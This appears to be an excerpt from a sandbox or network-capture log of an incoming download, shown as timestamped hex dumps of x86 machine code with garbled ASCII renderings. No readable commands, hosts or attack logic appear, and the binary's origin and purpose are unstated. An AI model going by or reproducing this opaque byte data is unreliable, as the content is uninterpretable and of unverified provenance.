2023-11-18 09:02:40 UTC	2704	IN	Data Raw: 08 89 54 24 10 85 ff 74 77 83 79 24 00 74 6b ff 4e 38 8b 46 38 89 07 8b 45 08 8b 1e 40 89 46 34 8b 51 24 8b 07 89 44 24 1c 85 d2 74 16 6a 00 6a 00 8b cb e8 8d ab 01 00 8b f8 83 c4 08 8b 44 24 1c eb 02 33 ff 80 7b 53 00 75 0d 6a 10 50 57 56 e8 60 45 01 00 83 c4 10 85 ff 74 09 8b d7 8b cb e8 30 b0 01 00 8b 4c 24 0c c7 46 34 00 00 00 00 c7 44 24 14 00 00 00 00 eb 0d c7 07 00 00 00 00 8b 45 18 89 44 24 14 83 7d 10 00 74 0c f6 41 38 08 74 06 0f b7 41 32 eb 04 0f b7 41 34 0f b7 f8 89 44 24 18 83 ff 01 75 20 8a 46 13 84 c0 75 08 ff 46 2c 8b 5e 2c eb 2f fe c8 88 46 13 0f b6 c0 8b 9c 86 94 00 00 00 eb 1e 8b 5e 20 3b 7e 1c 7f 0b 29 7e 1c 8d 04 1f 89 46 20 eb 0b 8b 46 2c 8d 58 01 03 c7 89 46 2c 8b 44 24 14 85 c0 74 13 3b 5d 1c 75 06 83 78 24 00 74 08 c7 44 24 14 00 Data Ascii: T$twy$tkN8F8E@F4Q$D$tjjD$3{SujPWV`Et0L$F4D$ED$}tA8tA2A4D$u FuF,^,/F^ ;~)~F F,XF,D$t;]ux$tD$
2023-11-18 09:02:40 UTC	2736	IN	Data Raw: b9 12 10 56 e8 4c 0d 05 00 8b 4d f8 83 c4 0c 8b d7 c6 46 11 01 e8 5b f7 ff ff 5f 5e 5b 8b e5 5d c3 8b 57 0c 8b ce e8 ba f0 ff ff 8b ce e8 a3 51 00 00 8b 4d f8 8b d7 c6 46 11 01 e8 35 f7 ff ff 5f 5e 5b 8b e5 5d c3 f6 43 38 03 74 21 6a 00 68 70 b9 12 10 56 e8 fb 0c 05 00 8b 4d f8 83 c4 0c 8b d7 e8 0e f7 ff ff 5f 5e 5b 8b e5 5d c3 8b 53 18 8b 4d f8 e8 2c ae fe ff 8b 49 10 8b d0 8b 43 0c 89 45 f0 8b c2 c1 e0 04 83 fa 01 89 45 ec 89 55 fc ba 09 00 00 00 8b 04 08 b9 50 b0 12 10 50 89 45 f4 b8 10 97 12 10 0f 44 c1 8b ce 6a 00 50 e8 50 70 00 00 83 c4 0c 85 c0 0f 85 a7 00 00 00 8b 45 f0 33 d2 ff 75 f4 83 7d fc 01 8b ce ff 30 0f 94 c2 ff 33 8d 14 55 0a 00 00 00 e8 24 70 00 00 83 c4 0c 85 c0 75 7f 8b ce e8 a6 6e fe ff 89 45 f0 85 c0 74 71 ff 75 fc ba 01 00 00 00 8b Data Ascii: VLMF[_^[]WQMF5_^[]C8t!jhpVM_^[]SM,ICEEUPPEDjPPpE3u}03U$punEtqu
2023-11-18 09:02:40 UTC	2768	IN	Data Raw: 0c 5f c7 04 88 62 00 00 00 89 54 88 04 c7 44 88 08 01 00 00 00 c7 44 88 10 00 00 00 00 5e 8b e5 5d c3 cc cc cc 55 8b ec 83 e4 f8 83 ec 0c 53 56 57 8b f9 8b c2 b1 20 89 44 24 10 88 4c 24 0f 8b 9f e4 00 00 00 85 db 0f 84 d1 00 00 00 0f bf 73 22 8b 43 04 c1 e6 04 83 c0 f0 03 f0 80 bf c8 00 00 00 01 75 13 68 bc b2 12 10 57 e8 e5 cc 04 00 83 c4 08 e9 a2 00 00 00 66 83 7e 0c 00 0f 87 87 00 00 00 8b 45 08 85 c0 74 48 8b 48 04 89 4c 24 14 83 f9 07 75 1b 51 ff 30 68 e8 b2 12 10 e8 92 ca 04 00 83 c4 0c 85 c0 74 24 8b 45 08 8b 4c 24 14 83 f9 06 75 54 51 ff 30 68 f0 b2 12 10 e8 72 ca 04 00 83 c4 0c 85 c0 75 40 b1 40 eb 08 8a 4c 24 0f 66 ff 4b 24 0f b6 c1 66 09 46 0e 0f b6 c1 09 43 1c f6 46 0e 01 74 09 8b d6 8b cf e8 73 04 00 00 ff 74 24 10 8b d3 8b cf 56 e8 85 1c 00 Data Ascii: _bTDD^]USVW D$L$s"CuhWf~EtHHL$uQ0ht$EL$uTQ0hru@@L$fK$fFCFtst$V
2023-11-18 09:02:40 UTC	2816	IN	Data Raw: 7b 51 8b d7 8b c8 e8 9a e6 f7 ff 8b f8 83 c4 04 eb 6c ff 74 24 18 8b 54 24 18 8b ce e8 34 08 fb ff 83 c4 04 85 c0 75 56 8d 44 24 24 33 d2 50 8d 44 24 20 8b ce 50 e8 2a e6 f7 ff 8b 5c 24 2c 83 c4 08 85 db 75 0f 8b 4e 10 8b 49 04 e8 c4 38 03 00 85 c0 7e 29 8b 4e 14 8b 46 10 c1 e1 04 83 c0 f0 03 c1 83 78 04 00 74 13 8b 4c 24 1c 8b d3 50 e8 30 e6 f7 ff 8b f8 83 c4 04 eb 02 33 ff ff 74 24 18 e8 3e f3 fa ff 83 c4 04 85 ff 75 43 80 7e 5b 00 75 07 8b ce e8 fa 65 03 00 83 66 18 ef f6 86 b4 00 00 00 04 c6 86 b0 00 00 00 00 75 0d 8d 54 24 0c 8b ce e8 db 2f fe ff 8b f8 80 7e 5b 00 75 07 8b ce e8 7c 65 03 00 85 ff 0f 84 ee 00 00 00 f6 86 b4 00 00 00 04 0f 85 99 00 00 00 8b 46 14 48 8b d8 89 44 24 24 8b 46 10 03 db 8b 4c d8 04 85 c9 74 1b e8 fb 3a 03 00 8b 46 10 c7 44 Data Ascii: {Qlt$T$4uVD$$3PD$ P*\$,uNI8~)NFxtL$P03t$>uC~[uefuT$/~[u\|eFHD$$FLt:FD
2023-11-18 09:02:40 UTC	2848	IN	Data Raw: 83 79 10 00 74 07 e8 8a 4e 02 00 eb 0d 0f 57 c0 66 0f 13 44 24 10 8b 44 24 10 8b 54 24 0c 89 44 24 1c 8b 87 78 01 00 00 89 44 24 10 c7 87 78 01 00 00 00 00 00 00 85 d2 0f 84 d0 00 00 00 8b 4c 24 08 85 c9 0f 84 c4 00 00 00 83 7c 24 1c 00 8b 47 20 89 44 24 08 74 0d 8b 47 24 81 67 20 ff ff ff 9f 89 47 24 ff 74 24 20 51 57 8d 4c 24 64 e8 31 1d 00 00 8b 4c 24 14 83 c4 0c 81 e1 00 00 00 60 09 4f 20 85 c0 75 58 8b 44 24 2c 85 c0 0f 85 94 00 00 00 8b 94 24 3c 01 00 00 85 d2 0f 84 85 00 00 00 80 7a 2b 02 75 7f 0f 57 c0 8d 44 24 58 0f 29 44 24 30 8d 4c 24 58 89 44 24 30 8d 44 24 30 0f 29 44 24 40 8b 52 2c 50 e8 c6 5b fd ff 83 c4 04 83 7c 24 7c 00 74 28 83 7c 24 64 00 74 21 8b 44 24 24 85 c0 74 19 8d 4c 24 58 8b d0 51 ff 76 0c 8b 4c 24 30 ff 76 08 e8 87 1e 00 00 83 Data Ascii: ytNWfD$D$T$D$xD$xL$\|$G D$tG$g G$t$ QWL$d1L$`O uXD$,$<z+uWD$X)D$0L$XD$0D$0)D$@R,P[\|$\|t(\|$dt!D$$tL$XQvL$0v
2023-11-18 09:02:40 UTC	2896	IN	Data Raw: 07 07 07 07 07 07 07 07 07 07 07 07 07 07 01 02 07 07 03 03 03 03 03 03 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 04 03 03 03 03 03 04 04 04 03 05 00 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 05 05 06 07 07 07 07 07 05 cc cc 55 8b ec 85 d2 74 29 66 0f 1f 84 00 00 00 00 00 8b 42 04 a9 00 10 04 00 74 16 a9 00 00 04 00 74 08 8b 42 14 8b 50 08 eb 03 8b 52 0c 85 d2 75 e0 85 c9 74 20 8b 41 04 a9 00 10 04 00 74 16 a9 00 00 04 00 74 08 8b 41 14 8b 48 08 eb 03 8b 49 0c 85 c9 75 e0 ff 75 08 52 8b d1 33 c9 e8 9f 00 00 00 83 c4 08 5d c3 cc cc cc cc Data Ascii: Ut)fBttBPRut AttAHIuuR3]
2023-11-18 09:02:40 UTC	2928	IN	Data Raw: 00 00 8b 47 2c c7 44 24 2c 00 00 00 00 c7 44 24 38 00 00 00 00 c7 44 24 30 00 00 00 00 8d 48 01 c7 44 24 34 00 00 00 00 03 c2 89 4c 24 28 89 47 2c 80 3e 89 75 29 8d 41 ff 89 4c 24 30 03 c2 89 54 24 34 50 51 8b 4c 24 14 ba 49 00 00 00 6a 00 c6 44 24 30 0a e8 8b ad 01 00 83 c4 0c eb 19 51 8b 4c 24 10 ba 46 00 00 00 6a 00 c6 44 24 2c 03 e8 40 ac 01 00 83 c4 08 83 7b 3c 00 ba 9a 00 00 00 6a 00 0f 84 89 00 00 00 8b 07 8d 4c 24 14 51 8b c8 89 44 24 20 c7 44 24 18 90 9d 12 10 c7 44 24 1c 01 00 00 00 e8 ca 37 00 00 8b c8 83 c4 08 89 4c 24 10 85 c9 74 3b c6 41 01 43 8b 4b 3c 8b 51 0c 85 d2 74 12 8b 4c 24 18 6a 00 6a 00 e8 f2 2a 00 00 83 c4 08 eb 02 33 c0 8b 4c 24 10 ba 34 00 00 00 51 50 8b cf e8 29 36 00 00 83 c4 08 89 44 24 10 8b 43 3c 8b 50 0c 85 d2 74 09 8b 4c Data Ascii: G,D$,D$8D$0HD$4L$(G,>u)AL$0T$4PQL$IjD$0QL$FjD$,@{<jL$QD$ D$D$7L$t;ACK<QtL$jj*3L$4QP)6D$C<PtL
2023-11-18 09:02:40 UTC	3744	IN	Data Raw: 89 8b 46 70 c7 04 88 13 00 00 00 89 54 88 04 89 54 88 08 c7 44 88 0c 00 00 00 00 c7 44 88 10 00 00 00 00 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 53 8a 1a 56 8b f1 57 80 fb af 75 76 8a c3 3a c3 75 03 8a 42 02 8b 7d 08 3c b0 75 07 8b 72 14 8b 06 eb 0c 3c 89 75 49 8b 72 14 8b 46 1c 8b 00 83 f8 01 7e 3c 80 fb 89 74 1d 80 7a 02 89 74 17 8d 04 bf 8b 4c 86 08 8b 45 10 89 08 8b 42 1c 03 c7 5f 5e 5b 59 5d c3 8b 46 1c 8d 0c bf 8b 4c 88 08 8b 45 10 89 08 8b 42 1c 03 c7 5f 5e 5b 59 5d c3 8b 45 10 8b ca 89 08 8b 42 1c 03 c7 5f 5e 5b 59 5d c3 80 fb 89 75 20 8b 42 14 8b 55 08 8b 40 1c 8d 0c 92 8b 4c 88 08 8b 45 10 89 08 8b 45 0c 03 c2 5f 5e 5b 59 5d c3 80 fb b0 75 25 8b 45 08 ff 75 14 8d 0c 80 8b 42 14 8b 54 88 08 8b ce 8b 45 10 89 10 e8 d4 90 Data Ascii: FpTTDD_^[]UQSVWuv:uB}<ur<uIrF~<tztLEB_^[Y]FLEB_^[Y]EB_^[Y]u BU@LEE_^[Y]u%EuBTE
2023-11-18 09:02:40 UTC	3760	IN	Data Raw: 74 32 b8 65 00 00 00 5e 8b e5 5d c3 8b 56 24 8b 42 04 89 46 24 c7 42 04 00 00 00 00 83 7e 28 00 75 05 e8 be 21 00 00 33 c9 b8 65 00 00 00 39 4e 24 0f 45 c1 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 51 56 8b 71 30 33 c0 57 8b fa 38 46 38 75 20 39 46 24 8d 56 24 74 0e 8d 4e 40 89 07 e8 4f 17 00 00 5f 5e 59 c3 c7 07 01 00 00 00 5f 5e 59 c3 8b ce e8 2a 10 00 00 8b d0 8b ce e8 01 20 00 00 85 c0 75 0d 8b ce e8 16 00 00 00 c7 07 00 00 00 00 5f 5e 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 14 53 8b d9 c7 45 fc 00 00 00 00 56 57 8b 43 48 8b 40 18 89 45 f4 8a 43 3c 3c 01 75 07 be c0 b6 0d 10 eb 0f 3c 02 be 10 b9 0d 10 b9 e0 b7 0d 10 0f 44 f1 33 c9 38 4b 3b 76 11 8d 53 60 89 32 8d 52 48 0f b6 43 3b 41 3b c8 7c f2 8d 55 fc 8b cb e8 f6 01 00 00 Data Ascii: t2e^]V$BF$B~(u!3e9N$E^]QVq03W8F8u 9F$V$tN@O_^Y_^Y* u_^YUSEVWCH@EC<<u<D38K;vS`2RHC;A;\|U
2023-11-18 09:02:40 UTC	3776	IN	Data Raw: 04 80 ff 74 c3 04 ff 34 c3 8b 42 08 8d 04 80 8d 0c c3 e8 de 08 01 00 8b 75 ec 83 c4 08 8b 4d e8 83 c6 14 8b 45 e4 8b 95 6c ff ff ff e9 a4 f9 ff ff 8b 55 ec 8b 4d d8 8b 42 04 8d 04 80 8d 1c c1 8b 42 08 8d 04 80 8d 34 c1 8b 42 0c 8d 04 80 8d 3c c1 0f b7 4b 08 8a 46 08 0a c1 89 4d c8 a8 01 74 21 8b cf e8 7c 09 01 00 8b 75 ec 8b 7d e0 83 c6 14 8b 4d e8 8b 45 e4 8b 95 6c ff ff ff e9 52 f9 ff ff f6 c1 12 75 2b 8a 55 b0 8b cb 6a 00 e8 21 10 01 00 83 c4 04 85 c0 0f 85 a9 54 00 00 66 8b 43 08 b9 fd ff 00 00 66 23 c1 0f b7 c8 89 4d c8 eb 29 f7 c1 00 40 00 00 74 21 8b cb e8 b3 10 01 00 85 c0 0f 85 7e 54 00 00 66 8b 43 08 b9 fd ff 00 00 66 23 c1 0f b7 c0 89 45 c8 0f b7 46 08 89 45 d4 a8 12 75 11 8a 55 b0 8b ce 6a 00 e8 c2 0f 01 00 83 c4 04 eb 0e a9 00 40 00 00 74 21 Data Ascii: t4BuMElUMBB4B<KFMt!\|u}MElRu+Uj!TfCf#M)@t!~TfCf#EFEuUj@t!
2023-11-18 09:02:40 UTC	4643	IN	Data Raw: 00 00 00 8b 45 ec 8b 50 04 8b ca 8b 47 10 03 c9 8b 44 c8 0c 8b 00 3b 85 40 ff ff ff 74 07 8b cf e8 98 40 fe ff 8b 86 a0 00 00 00 ba 11 00 00 00 83 e0 fd 89 55 dc 83 c8 01 89 86 a0 00 00 00 e9 2b 39 00 00 8b 55 ec 8d 85 f0 fe ff ff 8b 4f 10 50 8b 42 04 8b 52 0c 03 c0 8b 4c c1 04 e8 eb 1b 01 00 8b 55 ec 83 c4 04 8b 4d e8 e8 3d 3e 00 00 8b c8 8b 85 f0 fe ff ff e9 65 dd ff ff 8b 55 ec 8b 72 04 ff 72 0c 8b 52 08 c1 e6 04 03 77 10 8b 4e 04 e8 e6 1a 01 00 8b d0 83 c4 04 8b 45 ec 89 55 dc 8b 40 08 83 f8 01 75 1a 8b 45 ec 8b 4d ec 0f b7 40 02 8b 49 0c 2b c8 8b 46 0c 89 08 83 4f 18 01 eb 11 83 f8 02 75 0c 8b 45 ec 8b 4e 0c 8a 40 0c 88 41 4c 8b 75 ec 83 7e 04 01 75 18 33 d2 8b cf e8 76 7e 00 00 8b 4d e8 8b 55 dc 83 a1 a0 00 00 00 fc eb 03 8b 4d e8 85 d2 0f 85 6b 38 Data Ascii: EPGD;@t@U+9UOPBRLUM=>eUrrRwNEU@uEM@I+FOuEN@ALu~u3v~MUMk8
2023-11-18 09:02:40 UTC	4675	IN	Data Raw: a8 08 75 10 a8 02 74 3a ba 01 00 00 00 5e 5d e9 29 01 00 00 5e 5d e9 e2 ae 00 00 80 fa 42 75 22 0f b7 46 08 a8 02 75 11 a8 2c 74 0d 8a 55 08 6a 01 e8 57 b2 00 00 83 c4 04 b8 d3 ff 00 00 66 21 46 08 5e 5d c3 cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f8 83 ec 0c 56 8b 75 08 0f b7 46 08 83 e0 3f 0f b6 80 38 bc 13 10 83 f8 03 75 66 8a 46 0a 8d 54 24 08 8b 4e 10 88 44 24 08 ff 74 24 08 ff 76 0c e8 56 a7 02 00 83 c4 08 85 c0 7e 37 83 f8 01 75 1a f2 0f 10 54 24 08 8b d6 8b ce e8 2b 01 00 00 85 c0 74 07 66 83 4e 08 04 eb 0f f2 0f 10 44 24 08 66 83 4e 08 08 f2 0f 11 06 b8 fd ff 00 00 66 21 46 08 0f b7 46 08 83 e0 3f 0f b6 80 38 bc 13 10 5e 8b e5 5d c3 cc cc cc cc cc 55 8b ec 56 8b f1 80 fa 43 7c 23 0f b7 46 08 a8 04 75 42 a8 08 75 10 a8 02 74 3a ba 01 00 00 00 5e 5d Data Ascii: ut:^])^]Bu"Fu,tUjWf!F^]UVuF?8ufFT$ND$t$vV~7uT$+tfND$fNf!FF?8^]UVC\|#FuBut:^]
2023-11-18 09:02:40 UTC	4755	IN	Data Raw: 50 e8 47 64 00 00 83 c4 04 85 c0 75 63 8b 55 e8 8b 4d e4 50 ff 75 08 e8 b1 05 00 00 8b 4d 0c 83 c4 08 f7 45 e0 00 24 00 00 89 01 75 06 83 7d f0 00 74 08 8d 4d d8 e8 e2 70 00 00 33 c0 5f 5e 5b 8b e5 5d c3 8b 45 0c 68 74 09 13 10 68 98 49 01 00 68 38 e3 12 10 68 1c e3 12 10 6a 0b c7 00 00 00 00 00 e8 f5 7c 02 00 83 c4 14 b8 0b 00 00 00 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc 55 8b ec 83 ec 60 53 8b da 56 8b f1 89 5d f8 57 8b cb e8 e9 fe 00 00 0f b7 4b 30 33 c0 8b 7b 2c 8b 5b 28 89 75 ec 8b 75 f8 66 89 45 d4 89 45 e4 8b 46 74 8b 40 3c 2b c3 3b c8 7e 09 33 d2 8b c8 85 c0 0f 48 ca 89 5d dc 3b f9 77 0e b8 10 10 00 00 89 7d d8 66 89 45 d4 eb 1f 8d 45 cc 33 d2 50 57 8b ce e8 c8 63 00 00 83 c4 08 85 c0 0f 85 cd 00 00 00 8b 5d dc 8b 7d d8 0f b6 33 89 75 f8 81 fe 80 Data Ascii: PGducUMPuME$u}tMp3_^[]EhthIh8hj\|_^[]U`SV]WK03{,[(uufEEFt@<+;~3H];w}fEE3PWc]}3u
2023-11-18 09:02:40 UTC	4835	IN	Data Raw: 81 e0 00 00 00 0f 95 c0 c3 cc cc cc cc 8b 81 e0 00 00 00 89 42 18 89 91 e0 00 00 00 c3 55 8b ec 53 56 57 8b fa 8b d9 85 ff 0f 84 8f 00 00 00 8b 45 08 8d 04 80 8d 70 fb 8d 34 b7 3b f7 72 1e 8a 46 01 3c f9 7f 10 ff 76 10 0f be d0 8b cb e8 7a 00 00 00 83 c4 04 83 ee 14 3b f7 73 e2 85 db 74 54 83 bb 20 02 00 00 00 74 0d 8b d7 8b cb 5f 5e 5b 5d e9 c6 68 02 00 3b bb 74 01 00 00 73 36 3b bb 6c 01 00 00 72 13 8b 83 68 01 00 00 89 07 89 bb 68 01 00 00 5f 5e 5b 5d c3 3b bb 70 01 00 00 72 13 8b 83 60 01 00 00 89 07 89 bb 60 01 00 00 5f 5e 5b 5d c3 57 e8 d2 68 02 00 83 c4 04 5f 5e 5b 5d c3 cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 83 c2 11 83 fa 0a 77 76 ff 24 95 e8 b1 0e 10 8b 55 08 e8 a5 00 00 00 59 5d c3 8b 55 08 85 d2 74 5d e8 f6 67 02 00 59 5d c3 83 b9 20 02 00 Data Ascii: BUSVWEp4;rF<vz;stT t_^[]h;ts6;lrhh_^[];pr``_^[]Wh_^[]UQwv$UY]Ut]gY]
2023-11-18 09:02:40 UTC	4922	IN	Data Raw: 8b 03 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 67 ff ff ff 8b 4c 24 34 39 4c 24 44 7c 1e 7f 0a 8b 44 24 10 39 44 24 40 76 12 8b 03 51 ff 74 24 14 8b 40 10 53 ff d0 83 c4 0c 8b f0 85 f6 0f 85 37 ff ff ff 8b 54 24 0c 8b 42 40 8b 08 85 c9 75 05 8d 46 0c eb 11 6a 00 6a 15 50 8b 41 28 ff d0 8b 54 24 18 83 c4 0c 33 f6 83 f8 0c 0f 45 f0 85 f6 75 26 80 7a 07 00 75 20 0f b6 4a 0a 8b 52 40 85 c9 74 13 8b 02 51 52 8b 40 14 ff d0 8b 5d 08 83 c4 08 8b f0 eb 1e 33 f6 8b 5d 08 eb 17 8b 44 24 0c 33 d2 6a 00 8b c8 89 78 1c e8 dd 0e 01 00 83 c4 04 8b f0 85 f6 0f 85 c1 fe ff ff 8b 4b 04 33 d2 e8 e6 85 00 00 8b f0 b8 65 00 00 00 85 f6 0f 44 f0 e9 a6 fe ff ff cc cc cc cc cc 8b 41 18 8b 40 04 8b 10 8b 42 60 89 41 2c 89 4a 60 c7 41 28 01 00 00 00 c3 cc cc cc cc cc cc cc 55 8b Data Ascii: @gL$49L$D\|D$9D$@vQt$@S7T$B@uFjjPA(T$3Eu&zu JR@tQR@]3]D$3jxK3eDA@B`A,J`A(U
2023-11-18 09:02:40 UTC	4970	IN	Data Raw: 8c 28 ff ff ff 8b 44 24 78 8b 74 24 44 89 44 24 14 8b 44 24 10 c7 44 24 18 00 00 00 00 8b c8 89 4c 24 38 85 c0 0f 8e 89 02 00 00 8b 54 24 70 8d 84 24 e4 00 00 00 33 db bf 01 00 00 00 83 e8 04 89 7c 24 2c 89 44 24 50 0f 1f 44 00 00 39 b4 1c d0 00 00 00 0f 8e 67 01 00 00 0f 1f 00 3b f9 7c 22 8d 4f 01 89 4c 24 38 83 f9 05 0f 8f 3c 03 00 00 c7 84 1c d4 00 00 00 00 00 00 00 89 94 1c e8 00 00 00 8b b4 1c e4 00 00 00 8b 4c 24 7c 8d 7e ff 0f b7 04 79 66 85 c0 75 12 8b d7 8d 4c 24 70 e8 18 1a 00 00 8b 4c 24 7c 0f b7 c0 0f b7 c0 83 c0 02 29 84 1c d0 00 00 00 83 7c 24 30 00 0f 85 d2 00 00 00 3b 74 24 70 0f 8d c6 00 00 00 0f b7 04 71 66 85 c0 75 0e 8b d6 8d 4c 24 70 e8 db 19 00 00 0f b7 c0 0f b7 c0 83 c0 02 e9 a6 00 00 00 68 74 09 13 10 68 bc 1f 01 00 68 38 e3 12 10 Data Ascii: (D$xt$DD$D$D$L$8T$p$3\|$,D$PD9g;\|"OL$8<L$\|~yfuL$pL$\|)\|$0;t$pqfuL$phthh8
2023-11-18 09:02:40 UTC	5050	IN	Data Raw: 3b c7 74 08 8b c8 85 c9 75 f3 eb 06 8b 47 18 89 41 18 8b cf e8 54 43 00 00 80 7b 14 00 75 30 8b 4b 0c 85 c9 74 29 c7 43 0c 00 00 00 00 8b 49 48 8b 41 14 89 45 fc e8 b2 00 01 00 8b 4d fc 8b 81 f4 00 00 00 83 78 0c 00 75 05 e8 ee ca 00 00 ff 77 0c e8 36 a9 01 00 83 c4 04 ff 77 10 e8 2b a9 01 00 83 c4 04 f6 43 10 04 74 1d 83 7b 08 00 75 17 8b ce e8 55 1d 00 00 c7 47 08 00 00 00 00 33 c0 5f 5e 5b 8b e5 5d c3 80 7e 09 00 74 0d 83 46 0c ff 75 07 8b ce e8 02 49 00 00 c7 47 08 00 00 00 00 5f 5e 33 c0 5b 8b e5 5d c3 cc cc 0f 57 c0 0f 11 01 c7 41 10 00 00 00 00 c3 cc cc b8 c8 00 00 00 c3 cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 56 8b f1 57 8b fa 80 7e 09 00 74 3f ff 46 0c 80 7e 0a 00 75 05 e8 f2 47 00 00 ff 75 10 8b d7 8b ce ff 75 0c ff 75 08 e8 90 00 00 00 83 c4 Data Ascii: ;tuGATC{u0Kt)CIHAEMxuw6w+Ct{uUG3_^[]~tFuIG_^3[]WAUQVW~t?F~uGuuu
2023-11-18 09:02:40 UTC	5130	IN	Data Raw: c6 06 01 a1 c8 23 14 10 85 c0 74 1b 68 9a 01 00 00 ff d0 83 c4 04 85 c0 74 0d bf 0a 00 00 00 8b c7 5f 5e 8b e5 5d c3 8b 56 10 8d 44 24 0c 50 6a 00 ff 76 3c 8b ce ff 76 38 e8 3f 00 00 00 8b f8 83 c4 10 85 ff 75 27 ff 76 10 e8 3e 69 01 00 8b 44 24 10 83 c4 04 89 7e 10 85 c0 74 03 89 46 04 83 7e 04 00 74 08 80 3e 00 75 03 c6 06 02 8b c7 5f 5e 8b e5 5d c3 cc cc cc cc cc cc cc 55 8b ec 51 53 8b c2 8b d9 89 45 fc 56 57 85 c0 0f 84 d2 00 00 00 8b 7b 70 6a 00 0f b7 47 06 8b 4f 0c 8d 04 80 8d 04 c5 38 00 00 00 50 85 c9 74 07 e8 ca 63 01 00 eb 05 e8 63 6a 01 00 8b f0 83 c4 08 85 f6 0f 84 92 00 00 00 8b 55 08 8d 46 10 89 46 04 8b cf 89 3e 66 8b 47 06 56 ff 75 fc 66 40 66 89 46 08 e8 f6 d0 fe ff 0f b7 46 08 83 c4 08 66 85 c0 74 2d 66 3b 47 08 77 27 ff 75 14 8b d6 8b Data Ascii: #tht_^]VD$Pjv<v8?u'v>iD$~tF~t>u_^]UQSEVW{pjGO8PtccjUFF>fGVuf@fFFft-f;Gw'u
2023-11-18 09:02:40 UTC	5210	IN	Data Raw: 5f 89 30 5e 5b 5d c3 cc cc cc cc cc cc 8b 41 20 8b 00 c3 cc cc cc cc cc cc cc cc cc cc 8b 41 20 8b 00 83 c0 60 c3 cc cc cc cc cc cc cc 55 8b ec 56 8b 75 08 39 51 18 7e 11 8b 41 20 8b 04 90 89 06 85 c0 74 05 33 c0 5e 5d c3 56 e8 0d 00 00 00 83 c4 04 5e 5d c3 cc cc cc cc cc cc cc 55 8b ec 83 ec 08 53 56 57 8b f9 8b da 89 5d f8 39 5f 18 7f 50 8b 4f 20 8d 04 9d 04 00 00 00 6a 00 50 e8 99 26 01 00 8b f0 83 c4 08 85 f6 75 0f 8b 45 08 89 30 8d 46 07 5f 5e 5b 8b e5 5d c3 8b 4f 18 8b c3 2b c1 8d 04 85 04 00 00 00 50 8d 04 8e 6a 00 50 e8 47 36 f0 ff 8d 43 01 89 77 20 83 c4 0c 89 47 18 80 7f 2b 02 0f 85 95 00 00 00 83 3d c8 22 14 10 00 74 3a a1 e8 41 14 10 85 c0 74 0a 50 ff 15 18 23 14 10 83 c4 04 8d 55 fc b9 00 80 00 00 e8 98 2a 01 00 a1 e8 41 14 10 85 c0 74 0c 50 Data Ascii: _0^[]A A `UVu9Q~A t3^]V^]USVW]9_PO jP&uE0F_^[]O+PjPG6Cw G+="t:AtP#U*AtP
2023-11-18 09:02:40 UTC	5290	IN	Data Raw: 29 8b 75 d0 8b d3 2b 75 e4 8b 8f a8 00 00 00 1b 55 e0 83 c1 08 8b 87 ac 00 00 00 83 d0 00 50 51 52 56 e8 e6 20 f1 ff 89 45 fc 8b 87 9c 00 00 00 8d 77 50 39 06 75 22 83 7e 04 00 75 1c 8b 5d f0 8b cf 8b d3 e8 94 02 00 00 8b f0 85 f6 0f 85 ce 00 00 00 89 5f 1c 8d 77 50 33 db 39 5d fc 76 56 83 7d e8 00 74 2c ff 47 6c 8b 47 60 85 c0 74 0e c7 40 10 01 00 00 00 8b 40 2c 85 c0 75 f2 8b 8f f4 00 00 00 33 d2 e8 a2 3c 00 00 c7 45 e8 00 00 00 00 6a 00 6a 01 6a 00 8b d6 8b cf e8 bc 05 00 00 8b f0 83 c4 0c 85 f6 75 55 ff 45 f8 8d 77 50 43 3b 5d fc 72 aa 8b 45 d4 8d 77 50 8b 55 f4 8d 4d f0 51 8d 4d fc 51 50 ff 75 d0 8b cf e8 0b 16 00 00 83 c4 10 85 c0 0f 84 c0 fe ff ff 8b 5d f8 33 f6 83 f8 65 0f 45 f0 85 f6 75 38 6a ff 8d 55 dc 8b cf e8 35 f2 ff ff 83 c4 04 8b f0 eb 25 Data Ascii: )u+uUPQRV EwP9u"~u]_wP39]vV}t,GlG`t@@,u3<EjjjuUEwPC;]rEwPUMQMQPu]3eEu8jU5%
2023-11-18 09:02:40 UTC	5354	IN	Data Raw: 5e 75 19 8b 41 0c 80 78 20 00 74 10 6a 00 ff 31 ff 70 2c ff 15 4c 23 14 10 83 c4 0c c3 0f b7 41 1c a8 11 74 4a 25 ef ff 00 00 66 89 41 1c a8 01 74 3d 83 f0 03 c7 41 24 00 00 00 00 66 89 41 1c 8b 41 0c 8b 10 89 51 20 85 d2 74 05 89 4a 24 eb 0d 80 78 20 00 89 48 04 74 04 c6 40 21 01 83 78 08 00 89 08 75 09 f6 41 1c 08 75 03 89 48 08 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc f6 41 1c 02 74 3b 8b 51 0c 39 4a 08 75 06 8b 41 24 89 42 08 8b 41 24 56 8b 71 20 85 f6 74 05 89 46 24 eb 03 89 42 04 8b 71 24 8b 41 20 85 f6 74 05 89 46 20 eb 0a 89 02 85 c0 75 04 c6 42 21 02 5e 8b 41 0c 6a 01 ff 48 0c 8b 41 0c ff 31 ff 70 2c ff 15 4c 23 14 10 83 c4 0c c3 cc cc cc cc cc 8b 41 0c 66 ff 41 1e ff 40 0c c3 cc cc cc cc cc 8b 41 0c ff 48 0c 66 83 41 1e ff 0f 85 8e 00 00 00 f6 Data Ascii: ^uAx tj1p,L#AtJ%fAt=A$fAAQ tJ$x Ht@!xuAuHAt;Q9JuA$BA$Vq tF$Bq$A tF uB!^AjHA1p,L#AfA@AHfA
